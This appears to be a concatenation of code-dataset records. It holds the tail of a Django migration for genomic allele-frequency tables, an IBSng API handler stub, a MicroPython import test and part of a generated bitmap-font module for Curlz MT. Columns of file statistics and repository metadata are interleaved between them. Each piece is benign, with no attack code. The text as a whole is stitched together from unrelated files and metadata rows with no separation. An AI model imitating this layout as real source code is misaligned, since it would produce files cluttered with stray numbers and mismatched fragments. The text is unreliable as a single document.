auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("release", models.CharField(max_length=32)),
("chromosome", models.CharField(max_length=32)),
("position", models.IntegerField()),
("reference", models.CharField(max_length=512)),
("alternative", models.CharField(max_length=512)),
("ac", models.IntegerField(null=True)),
("ac_afr", models.IntegerField(null=True)),
("ac_amr", models.IntegerField(null=True)),
("ac_asj", models.IntegerField(null=True)),
("ac_eas", models.IntegerField(null=True)),
("ac_fin", models.IntegerField(null=True)),
("ac_nfe", models.IntegerField(null=True)),
("ac_oth", models.IntegerField(null=True)),
("ac_sas", models.IntegerField(null=True)),
("an", models.IntegerField(null=True)),
("an_afr", models.IntegerField(null=True)),
("an_amr", models.IntegerField(null=True)),
("an_asj", models.IntegerField(null=True)),
("an_eas", models.IntegerField(null=True)),
("an_fin", models.IntegerField(null=True)),
("an_nfe", models.IntegerField(null=True)),
("an_oth", models.IntegerField(null=True)),
("an_sas", models.IntegerField(null=True)),
("hemi", models.IntegerField(null=True)),
("hemi_afr", models.IntegerField(null=True)),
("hemi_amr", models.IntegerField(null=True)),
("hemi_asj", models.IntegerField(null=True)),
("hemi_eas", models.IntegerField(null=True)),
("hemi_fin", models.IntegerField(null=True)),
("hemi_nfe", models.IntegerField(null=True)),
("hemi_oth", models.IntegerField(null=True)),
("hemi_sas", models.IntegerField(null=True)),
("hom", models.IntegerField(null=True)),
("hom_afr", models.IntegerField(null=True)),
("hom_amr", models.IntegerField(null=True)),
("hom_asj", models.IntegerField(null=True)),
("hom_eas", models.IntegerField(null=True)),
("hom_fin", models.IntegerField(null=True)),
("hom_nfe", models.IntegerField(null=True)),
("hom_oth", models.IntegerField(null=True)),
("hom_sas", models.IntegerField(null=True)),
("popmax", models.CharField(max_length=8, null=True)),
("ac_popmax", models.IntegerField(null=True)),
("an_popmax", models.IntegerField(null=True)),
("af_popmax", models.FloatField(null=True)),
("hemi_popmax", models.IntegerField(null=True)),
("hom_popmax", models.IntegerField(null=True)),
("af", models.FloatField(null=True)),
("af_afr", models.FloatField(null=True)),
("af_amr", models.FloatField(null=True)),
("af_asj", models.FloatField(null=True)),
("af_eas", models.FloatField(null=True)),
("af_fin", models.FloatField(null=True)),
("af_nfe", models.FloatField(null=True)),
("af_oth", models.FloatField(null=True)),
("af_sas", models.FloatField(null=True)),
],
),
migrations.CreateModel(
name="GnomadGenomes",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("release", models.CharField(max_length=32)),
("chromosome", models.CharField(max_length=32)),
("position", models.IntegerField()),
("reference", models.CharField(max_length=512)),
("alternative", models.CharField(max_length=512)),
("ac", models.IntegerField(null=True)),
("ac_afr", models.IntegerField(null=True)),
("ac_amr", models.IntegerField(null=True)),
("ac_asj", models.IntegerField(null=True)),
("ac_eas", models.IntegerField(null=True)),
("ac_fin", models.IntegerField(null=True)),
("ac_nfe", models.IntegerField(null=True)),
("ac_oth", models.IntegerField(null=True)),
("an", models.IntegerField(null=True)),
("an_afr", models.IntegerField(null=True)),
("an_amr", models.IntegerField(null=True)),
("an_asj", models.IntegerField(null=True)),
("an_eas", models.IntegerField(null=True)),
("an_fin", models.IntegerField(null=True)),
("an_nfe", models.IntegerField(null=True)),
("an_oth", models.IntegerField(null=True)),
("hemi", models.IntegerField(null=True)),
("hemi_afr", models.IntegerField(null=True)),
("hemi_amr", models.IntegerField(null=True)),
("hemi_asj", models.IntegerField(null=True)),
("hemi_eas", models.IntegerField(null=True)),
("hemi_fin", models.IntegerField(null=True)),
("hemi_nfe", models.IntegerField(null=True)),
("hemi_oth", models.IntegerField(null=True)),
("hom", models.IntegerField(null=True)),
("hom_afr", models.IntegerField(null=True)),
("hom_amr", models.IntegerField(null=True)),
("hom_asj", models.IntegerField(null=True)),
("hom_eas", models.IntegerField(null=True)),
("hom_fin", models.IntegerField(null=True)),
("hom_nfe", models.IntegerField(null=True)),
("hom_oth", models.IntegerField(null=True)),
("popmax", models.CharField(max_length=8, null=True)),
("ac_popmax", models.IntegerField(null=True)),
("an_popmax", models.IntegerField(null=True)),
("af_popmax", models.FloatField(null=True)),
("hemi_popmax", models.IntegerField(null=True)),
("hom_popmax", models.IntegerField(null=True)),
("af", models.FloatField(null=True)),
("af_afr", models.FloatField(null=True)),
("af_amr", models.FloatField(null=True)),
("af_asj", models.FloatField(null=True)),
("af_eas", models.FloatField(null=True)),
("af_fin", models.FloatField(null=True)),
("af_nfe", models.FloatField(null=True)),
("af_oth", models.FloatField(null=True)),
],
),
migrations.CreateModel(
name="ThousandGenomes",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("release", models.CharField(max_length=32)),
("chromosome", models.CharField(max_length=32)),
("position", models.IntegerField()),
("reference", models.CharField(max_length=512)),
("alternative", models.CharField(max_length=512)),
("ac", models.IntegerField(null=True)),
("an", models.IntegerField(null=True)),
("het", models.IntegerField(null=True)),
("hom", models.IntegerField(null=True)),
("af", models.FloatField(null=True)),
("af_afr", models.FloatField(null=True)),
("af_amr", models.FloatField(null=True)),
("af_eas", models.FloatField(null=True)),
("af_eur", models.FloatField(null=True)),
("af_sas", models.FloatField(null=True)),
],
),
migrations.AddIndex(
model_name="thousandgenomes",
index=models.Index(
fields=["release", "chromosome", "position", "reference", "alternative"],
name="frequencies_release_e5bf46_idx",
),
),
migrations.AlterUniqueTogether(
name="thousandgenomes",
unique_together=set(
[("release", "chromosome", "position", "reference", "alternative")]
),
),
migrations.AddIndex(
model_name="gnomadgenomes",
index=models.Index(
fields=["release", "chromosome", "position", "reference", "alternative"],
name="frequencies_release_952459_idx",
),
),
migrations.AlterUniqueTogether(
name="gnomadgenomes",
unique_together=set(
[("release", "chromosome", "position", "reference", "alternative")]
),
),
migrations.AddIndex(
model_name="gnomadexomes",
index=models.Index(
fields=["release", "chromosome", "position", "reference", "alternative"],
name="frequencies_release_72be93_idx",
),
),
migrations.AlterUniqueTogether(
name="gnomadexomes",
unique_together=set(
[("release", "chromosome", "position", "reference", "alternative")]
),
),
migrations.AddIndex(
model_name="exac",
index=models.Index(
fields=["release", "chromosome", "position", "reference", "alternative"],
name="frequencies_release_668614_idx",
),
),
migrations.AlterUniqueTogether(
name="exac",
unique_together=set(
[("release", "chromosome", "position", "reference", "alternative")]
),
),
]
| 49.031579
| 95
| 0.51789
| 1,246
| 13,974
| 5.658909
| 0.069021
| 0.173592
| 0.361934
| 0.427741
| 0.925542
| 0.925542
| 0.925542
| 0.921997
| 0.913204
| 0.90512
| 0
| 0.008528
| 0.328682
| 13,974
| 284
| 96
| 49.204225
| 0.743098
| 0.004938
| 0
| 0.894928
| 1
| 0
| 0.127823
| 0.008632
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007246
| 0
| 0.021739
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2a1d19a16293385d54b964afb4723a793f75f1ed
| 162
|
py
|
Python
|
ibsng/handler/group/get_group_credits.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 6
|
2018-03-06T10:16:36.000Z
|
2021-12-05T12:43:10.000Z
|
ibsng/handler/group/get_group_credits.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 3
|
2018-03-06T10:27:08.000Z
|
2022-01-02T15:21:27.000Z
|
ibsng/handler/group/get_group_credits.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 3
|
2018-01-06T16:28:31.000Z
|
2018-09-17T19:47:19.000Z
|
"""Get group credit API method."""
from ibsng.handler.handler import Handler
class getGroupCredits(Handler):
"""Get group credit method class."""
pass
| 18
| 41
| 0.709877
| 20
| 162
| 5.75
| 0.6
| 0.13913
| 0.243478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.17284
| 162
| 8
| 42
| 20.25
| 0.858209
| 0.364198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
aa74bb45f08b3ff9b283344c7f00d56b0ccf9f37
| 125
|
py
|
Python
|
tests/import/import_pkg5.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 13,648
|
2015-01-01T01:34:51.000Z
|
2022-03-31T16:19:53.000Z
|
tests/import/import_pkg5.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 7,092
|
2015-01-01T07:59:11.000Z
|
2022-03-31T23:52:18.000Z
|
tests/import/import_pkg5.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 4,942
|
2015-01-02T11:48:50.000Z
|
2022-03-31T19:57:10.000Z
|
# This tests relative imports as used in pkg3
import pkg3
import pkg3.mod1
import pkg3.subpkg1.mod1
pkg3.subpkg1.mod1.foo()
| 17.857143
| 45
| 0.792
| 21
| 125
| 4.714286
| 0.571429
| 0.30303
| 0.282828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092593
| 0.136
| 125
| 6
| 46
| 20.833333
| 0.824074
| 0.344
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2ab824634cd145a03cc75a0c4e9bbe8d1bd7f34c
| 77,990
|
py
|
Python
|
gaugette/fonts/curlz_22.py
|
wsiffer/Google-Bartender
|
37018d3efe33a84074a6dccbce9e82f20ef3c923
|
[
"MIT"
] | 6
|
2020-07-30T00:21:29.000Z
|
2022-03-16T23:31:09.000Z
|
gaugette/fonts/curlz_22.py
|
antndeb/Google-Bartender
|
37018d3efe33a84074a6dccbce9e82f20ef3c923
|
[
"MIT"
] | null | null | null |
gaugette/fonts/curlz_22.py
|
antndeb/Google-Bartender
|
37018d3efe33a84074a6dccbce9e82f20ef3c923
|
[
"MIT"
] | 1
|
2022-03-16T23:39:29.000Z
|
2022-03-16T23:39:29.000Z
|
# coding=utf-8
# Module curlz_mt_22
# generated from Curlz MT 15.75pt
name = "Curlz MT 22"
start_char = '!'
end_char = chr(127)
char_height = 22
space_width = 11
gap_width = 2
bitmaps = (
# @0 '!' (3 pixels wide)
0x00, #
0x00, #
0x60, # OO
0x60, # OO
0x60, # OO
0x60, # OO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x00, #
0xE0, # OOO
0xA0, # O O
0x20, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @22 '"' (3 pixels wide)
0x00, #
0x00, #
0xA0, # O O
0xA0, # O O
0xA0, # O O
0xA0, # O O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @44 '#' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x04, 0x00, # O
0x24, 0x00, # O O
0x24, 0x00, # O O
0xFF, 0x80, # OOOOOOOOO
0x24, 0x00, # O O
0x24, 0x00, # O O
0xFF, 0x00, # OOOOOOOO
0x24, 0x00, # O O
0x44, 0x00, # O O
0x40, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @88 '$' (6 pixels wide)
0x10, # O
0x10, # O
0x10, # O
0x78, # OOOO
0xDC, # OO OOO
0x9C, # O OOO
0x80, # O
0x80, # O
0x40, # O
0x20, # O
0x10, # O
0x68, # OO O
0xA8, # O O O
0x88, # O O
0x70, # OOO
0x20, # O
0x20, # O
0x20, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @110 '%' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x40, # O
0x00, 0x80, # O
0x51, 0x80, # O O OO
0xB9, 0x00, # O OOO O
0xBA, 0x00, # O OOO O
0x8C, 0x00, # O OO
0x74, 0x00, # OOO O
0x08, 0x00, # O
0x10, 0x00, # O
0x17, 0x00, # O OOO
0x2F, 0x80, # O OOOOO
0x2A, 0x80, # O O O O
0x48, 0x80, # O O O
0x87, 0x00, # O OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @154 '&' (13 pixels wide)
0x00, 0x00, #
0x1C, 0x00, # OOO
0x22, 0x00, # O O
0x4A, 0x00, # O O O
0x4C, 0x00, # O OO
0x40, 0x00, # O
0x20, 0x00, # O
0x18, 0x00, # OO
0x0E, 0x38, # OOO OOO
0x33, 0xC0, # OO OOOO
0x44, 0x80, # O O O
0x8A, 0x40, # O O O O
0x8E, 0x40, # O OOO O
0xC0, 0x40, # OO O
0x60, 0x80, # OO O
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @198 ''' (1 pixels wide)
0x00, #
0x00, #
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @220 '(' (4 pixels wide)
0x00, #
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x20, # O
0x20, # O
0x10, # O
0x00, #
0x00, #
0x00, #
# @242 ')' (4 pixels wide)
0x00, #
0x80, # O
0x40, # O
0x40, # O
0x20, # O
0x20, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x20, # O
0x40, # O
0x40, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @264 '*' (7 pixels wide)
0x00, #
0x00, #
0x08, # O
0x48, # O O
0x2E, # O OOO
0x38, # OOO
0xD8, # OO OO
0x14, # O O
0x12, # O O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @286 '+' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0xFF, 0xE0, # OOOOOOOOOOO
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @330 ',' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xC0, # OO
0xC0, # OO
0x40, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @352 '-' (5 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @374 '.' (1 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @396 '/' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x80, # O
0x01, 0x00, # O
0x01, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x10, 0x00, # O
0x10, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x80, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @440 '0' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x08, 0x00, # O
0x1E, 0x00, # OOOO
0x35, 0x00, # OO O O
0x75, 0x00, # OOO O O
0x58, 0x80, # O OO O
0xC0, 0x80, # OO O
0xC0, 0x80, # OO O
0xC0, 0x80, # OO O
0xC0, 0x80, # OO O
0xC0, 0x80, # OO O
0x41, 0x00, # O O
0x61, 0x00, # OO O
0x32, 0x00, # OO O
0x1C, 0x00, # OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @484 '1' (8 pixels wide)
0x00, #
0x00, #
0xCC, # OO OO
0xF4, # OOOO O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x0F, # OOOO
0x30, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @506 '2' (8 pixels wide)
0x00, #
0x00, #
0x1C, # OOO
0x24, # O O
0x72, # OOO O
0x72, # OOO O
0x22, # O O
0x04, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x46, # O OO
0x87, # O OOO
0xF1, # OOOO O
0x8E, # O OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @528 '3' (7 pixels wide)
0x00, #
0x00, #
0x78, # OOOO
0xCC, # OO OO
0xB6, # O OO OO
0x76, # OOO OO
0x06, # OO
0x0C, # OO
0x18, # OO
0x70, # OOO
0x0C, # OO
0x06, # OO
0x66, # OO OO
0xA6, # O O OO
0x8C, # O OO
0x78, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @550 '4' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x79, 0x00, # OOOO O
0x85, 0x00, # O O O
0xA7, 0x00, # O O OOO
0xE6, 0x00, # OOO OO
0x0A, 0x00, # O O
0x12, 0x00, # O O
0x22, 0x00, # O O
0x42, 0x00, # O O
0xFF, 0xC0, # OOOOOOOOOO
0x02, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x1F, 0x80, # OOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @594 '5' (9 pixels wide)
0x00, 0x00, #
0x07, 0x00, # OOO
0x01, 0x00, # O
0xFE, 0x00, # OOOOOOO
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0xFC, 0x00, # OOOOOO
0x07, 0x00, # OOO
0x03, 0x00, # OO
0x01, 0x80, # OO
0x71, 0x80, # OOO OO
0xB1, 0x80, # O OO OO
0x83, 0x00, # O OO
0xC6, 0x00, # OO OO
0x3C, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @638 '6' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x07, 0x00, # OOO
0x18, 0x80, # OO O
0x20, 0x80, # O O
0x21, 0x80, # O OO
0x40, 0x00, # O
0x40, 0x00, # O
0xDE, 0x00, # OO OOOO
0xE3, 0x00, # OOO OO
0xE9, 0x80, # OOO O OO
0xF1, 0x80, # OOOO OO
0x61, 0x80, # OO OO
0x61, 0x00, # OO O
0x32, 0x00, # OO O
0x1C, 0x00, # OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @682 '7' (7 pixels wide)
0x00, #
0x00, #
0xE0, # OOO
0xFE, # OOOOOOO
0x82, # O O
0x84, # O O
0x08, # O
0x08, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x58, # O OO
0x58, # O OO
0x48, # O O
0x30, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @704 '8' (7 pixels wide)
0x00, #
0x00, #
0x3C, # OOOO
0x42, # O O
0x9A, # O OO O
0x92, # O O O
0x8C, # O OO
0x48, # O O
0x30, # OO
0x30, # OO
0x2C, # O OO
0x42, # O O
0x42, # O O
0x42, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @726 '9' (8 pixels wide)
0x00, #
0x00, #
0x38, # OOO
0x64, # OO O
0x46, # O OO
0xC3, # OO OO
0xC3, # OO OO
0xDB, # OO OO OO
0xDB, # OO OO OO
0x7B, # OOOO OO
0x33, # OO OO
0x02, # O
0x06, # OO
0x46, # O OO
0x4C, # O OO
0x38, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @748 ':' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xC0, # OO
0xC0, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xC0, # OO
0xC0, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @770 ';' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xC0, # OO
0xC0, # OO
0x40, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @792 '<' (12 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x30, # OO
0x00, 0xE0, # OOO
0x03, 0x00, # OO
0x0C, 0x00, # OO
0x70, 0x00, # OOO
0x80, 0x00, # O
0x60, 0x00, # OO
0x18, 0x00, # OO
0x04, 0x00, # O
0x03, 0x00, # OO
0x00, 0xC0, # OO
0x00, 0x20, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @836 '=' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0xE0, # OOOOOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0xE0, # OOOOOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @880 '>' (12 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xC0, 0x00, # OO
0x30, 0x00, # OO
0x0C, 0x00, # OO
0x03, 0x00, # OO
0x00, 0xE0, # OOO
0x00, 0x10, # O
0x00, 0x60, # OO
0x01, 0x80, # OO
0x02, 0x00, # O
0x0C, 0x00, # OO
0x30, 0x00, # OO
0x40, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @924 '?' (7 pixels wide)
0x00, #
0x00, #
0x78, # OOOO
0xC4, # OO O
0xF2, # OOOO O
0xD2, # OO O O
0x62, # OO O
0x02, # O
0x04, # O
0x18, # OO
0x10, # O
0x10, # O
0x10, # O
0x00, #
0x10, # O
0x10, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @946 '@' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x1F, 0x00, # OOOOO
0x21, 0x80, # O OO
0x41, 0xC0, # O OOO
0x8F, 0x40, # O OOOO O
0x92, 0x40, # O O O O
0x96, 0x40, # O O OO O
0x8E, 0x80, # O OOO O
0x83, 0x00, # O OO
0x40, 0x00, # O
0x21, 0x00, # O O
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @990 'A' (14 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0xF0, # OOOO
0x01, 0x10, # O O
0x02, 0x20, # O O
0x06, 0x20, # OO O
0x24, 0x20, # O O O
0x24, 0x20, # O O O
0x14, 0x30, # O O OO
0x0F, 0xE0, # OOOOOOO
0x04, 0x20, # O O
0x04, 0x20, # O O
0x48, 0x20, # O O O
0xC8, 0x20, # OO O O
0x88, 0x14, # O O O O
0x70, 0x18, # OOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1034 'B' (10 pixels wide)
0x08, 0x00, # O
0x08, 0x00, # O
0x3E, 0x00, # OOOOO
0xC9, 0x80, # OO O OO
0xA8, 0xC0, # O O O OO
0x68, 0x40, # OO O O
0x08, 0x40, # O O
0x08, 0x40, # O O
0x08, 0x80, # O O
0x0B, 0x00, # O OO
0x09, 0x80, # O OO
0x08, 0x80, # O O
0x08, 0x80, # O O
0x09, 0x00, # O O
0x3E, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1078 'C' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x0F, 0x80, # OOOOO
0x10, 0xC0, # O OO
0x27, 0x40, # O OOO O
0x45, 0x40, # O O O O
0x43, 0x80, # O OOO
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0xC0, 0x40, # OO O
0x40, 0x40, # O O
0x20, 0x40, # O O
0x30, 0x80, # OO O
0x0F, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1122 'D' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x10, 0x00, # O
0x1F, 0x80, # OOOOOO
0x78, 0x60, # OOOO OO
0xE8, 0x30, # OOO O OO
0xE8, 0x10, # OOO O O
0x08, 0x08, # O O
0x08, 0x08, # O O
0x0C, 0x08, # OO O
0x04, 0x08, # O O
0x04, 0x10, # O O
0x04, 0x10, # O O
0x04, 0x60, # O OO
0x05, 0x80, # O OO
0x1E, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1166 'E' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFC, 0x00, # OOOOOO
0x44, 0x00, # O O
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x7C, 0x00, # OOOOO
0x40, 0x00, # O
0x43, 0x80, # O OOO
0x42, 0x80, # O O O
0x40, 0x80, # O O
0xFF, 0x00, # OOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1210 'F' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0xFE, # OOOOOOO
0x42, # O O
0x5A, # O OO O
0x5C, # O OOO
0x40, # O
0x40, # O
0x40, # O
0x7C, # OOOOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1232 'G' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x0F, 0x00, # OOOO
0x10, 0xC0, # O OO
0x23, 0x40, # O OO O
0x42, 0x40, # O O O
0x43, 0x80, # O OOO
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x81, 0xF8, # O OOOOOO
0x40, 0x20, # O O
0x60, 0x20, # OO O
0x30, 0x60, # OO OO
0x0F, 0xA0, # OOOOO O
0x00, 0x20, # O
0x01, 0xA0, # OO O
0x01, 0x20, # O O
0x00, 0xC0, # OO
0x00, 0x00, #
0x00, 0x00, #
# @1276 'H' (14 pixels wide)
